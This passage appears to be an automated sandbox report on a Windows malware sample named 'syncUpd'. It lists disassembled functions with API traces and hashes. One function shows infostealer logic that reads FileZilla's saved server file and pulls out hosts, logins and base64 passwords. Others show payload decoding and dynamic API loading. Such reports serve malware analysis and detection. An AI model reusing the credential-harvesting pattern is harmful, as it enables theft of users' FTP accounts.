                                                                                                                                                                                                                                                              Function 004094A0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4291131564-0
                                                                                                                                                                                                                                                              • Opcode ID: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                                                              • Instruction ID: 8ba321113e6e4d0cf3898c04bf9160a1f44f8cb9f34d86efd4b3c4bff5612467
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA119074240308AFEB14CF64CC95FAA77B6FB89711F208059FA159B3D0C7B5AA41CB94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F9707 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008F4E15,00000000,00000000), ref: 008F9736
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,008F4E15,00000000,?), ref: 008F9748
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008F4E15,00000000,00000000), ref: 008F9771
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,008F4E15,00000000,?), ref: 008F9786
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4291131564-0
                                                                                                                                                                                                                                                              • Opcode ID: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                                                              • Instruction ID: 35d3d32a610bd1dffb60a27eb5d851210b70ccf3e8b6eec3b767e12beca8f252
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2119074240308AFEB20DF64CC95FAA77B6FB89711F208459FA159B2D0C7B1A941CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                              • API String ID: 0-2784972518
                                                                                                                                                                                                                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                              • Instruction ID: 22004f60f1222c54a672ca6cb3ed1b594e5f4af3c6de3c3bc3ab30aad14aca82
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2314BB6A00609DFDB10CF99C880AADBBF5FF48324F64414AD541E7212D7B1EA45CFA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00942E03 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758267027.0000000000942000.00000040.00000020.00020000.00000000.sdmp, Offset: 00942000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_942000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                              • Instruction ID: 85f4026c25db6e9ed72d78eccab3a833355819db69b21b411fca5576bee52b89
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14111872340101AFD754DF55DC81EA773AAFB89360B698465E908CB316D679E8428760
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F0D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                              • Instruction ID: 1977726e87bd77f5db1896a9366490e6caaceeeeb320a4f47ec0234eb277afc5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E901F272A016088FDF21DF70C804BBA33E9FB86306F1545A4DA0AD7282E370A8418F80
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00415DC0 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                                                                                                                                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00906027 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                                                                                                                                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0041952A Relevance: 129.2, APIs: 86, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
                                                                                                                                                                                                                                                              • Instruction ID: 5df7b21d12798ad2dd02b2714939a7e9e3589bb161cd2ca89e36415dbd51ea28
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE71E331494B009BD7633B32DD03ADA7AB27F04304F10596EB1FB20632DA3678E79A59
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00909791 Relevance: 129.2, APIs: 86, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
                                                                                                                                                                                                                                                              • Instruction ID: 4733a89b3843e335dfd64dc3dc6cfc3ee46c7e91dbff35130eda79868e99ee4c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C671D531815B24BFD7623BB1DE43B59FEA37F84330F21C914B1B620DB29A2278659A51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363stringmemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EBD3
                                                                                                                                                                                                                                                                • Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
                                                                                                                                                                                                                                                                • Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EC1D
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EC67
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040ECB5
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,login: ), ref: 0040EE13
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EE26
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,password: ), ref: 0040EE44
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EE57
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040EEB9
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040EF17
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                                                                                                                                              • API String ID: 337689325-555421843
                                                                                                                                                                                                                                                              • Opcode ID: d747a968b6de8bdf59b0ebdfde02712db7aa4e2b4a366dc34ce4c53e9708f366
                                                                                                                                                                                                                                                              • Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d747a968b6de8bdf59b0ebdfde02712db7aa4e2b4a366dc34ce4c53e9708f366
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00906137 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624A00), ref: 00906178
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624DA4), ref: 00906191
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624E10), ref: 009061A9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624A60), ref: 009061C1
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624A4C), ref: 009061DA
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624AEC), ref: 009061F2
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624CB8), ref: 0090620A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624B30), ref: 00906223
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624D84), ref: 0090623B
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624D28), ref: 00906253
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624BAC), ref: 0090626C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624AE0), ref: 00906284
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624DD8), ref: 0090629C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,006248B0), ref: 009062B5
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624D7C), ref: 009062CD
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624A20), ref: 009062E5
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624C08), ref: 009062FE
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624E00), ref: 00906316
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,006248BC), ref: 0090632E
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624928), ref: 00906347
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624AAC), ref: 0090635F
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00624D30,?,00903927), ref: 00906371
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00624978,?,00903927), ref: 00906382
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00624900,?,00903927), ref: 00906394
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(006249D8,?,00903927), ref: 009063A6
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00624B1C,?,00903927), ref: 009063B7
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00624E98,00624C94), ref: 009063D9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00624FB8,00624C14), ref: 009063FA
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00624FB8,006249C8), ref: 00906412
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(006250A8,00624B88), ref: 00906434
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00624F6C,00624924), ref: 00906455
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00624F9C,00624C04), ref: 00906476
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00624F9C,0041D12C), ref: 0090648D
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2238633743-0
                                                                                                                                                                                                                                                              • Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                                                              • Instruction ID: d4aa2cfe4fe3deba262eae2cdb7e029af101058de839555c34d9f5383f1d1ee9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0A140B5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008FECF7 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
